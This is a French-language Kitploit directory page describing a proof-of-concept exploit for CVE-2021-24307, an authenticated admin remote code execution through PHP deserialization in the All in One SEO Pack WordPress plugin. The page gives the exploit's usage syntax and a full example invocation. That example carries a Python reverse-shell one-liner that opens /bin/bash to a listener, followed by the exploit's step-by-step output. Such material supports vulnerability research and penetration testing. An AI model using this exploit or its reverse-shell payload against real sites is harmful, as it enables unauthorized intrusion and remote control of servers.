Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-24307-all-in-one-seo-pack-admin-rce — Preuve de concept d'exploitation pour CVE-2021-24307, une RCE admin authentifiée dans All in One SEO Pack <= 4.1.0.1 via une désérialisation PHP, permettant l'exécution arbitraire de commandes. | Kitploit
Outils/GitHubGitHub/darkpills/cve-2021-24307-all-in-one-seo-pack-admin-rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubdarkpills/cve-2021-24307-all-in-one-seo-pack-admin-rce

CVE-2021-24307-all-in-one-seo-pack-admin-rce

Preuve de concept d'exploitation pour CVE-2021-24307, une RCE admin authentifiée dans All in One SEO Pack <= 4.1.0.1 via une désérialisation PHP, permettant l'exécution arbitraire de commandes.

Voir le dépôt
425il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

RCE par désérialisation PHP admin dans All in One SEO Pack (CVE-2021-24307)

PoC simple d'une RCE authentifiée admin dans AISEO <= 4.1.0.1 fourni à titre d'exemple.

Article complet ici : https://darkpills.com/php-unserialize-write-up-with-admin-rce-in-all-in-one-seo-pack-cve-2021-24307/

Utilisation :

root@kitploit:~
php exploit.php url login password php_command arguments [proxy]

Exemple :

root@kitploit:~
└─$ php exploit.php http://wordpress/ admin admin shell_exec "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" localhost:8080

-- All-in-one-seo-pack <= 4.1.0.1 RCE admin authentifiée --
-- Exploit par Vincent MICHEL (@darkpills) --

[+] Authentification à wordpress http://wordpress/
[+] Récupération du nonce WP REST API
[+] Nonce trouvé : 6aeb9ddf05
[+] Génération du payload POST pour exécuter la commande : shell_exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'")
[+] Téléversement du fichier ini avec les paramètres d'importation
[+] Terminé ! Vérifiez le résultat quelque part (exécution de commande aveugle)
Télécharger l’outil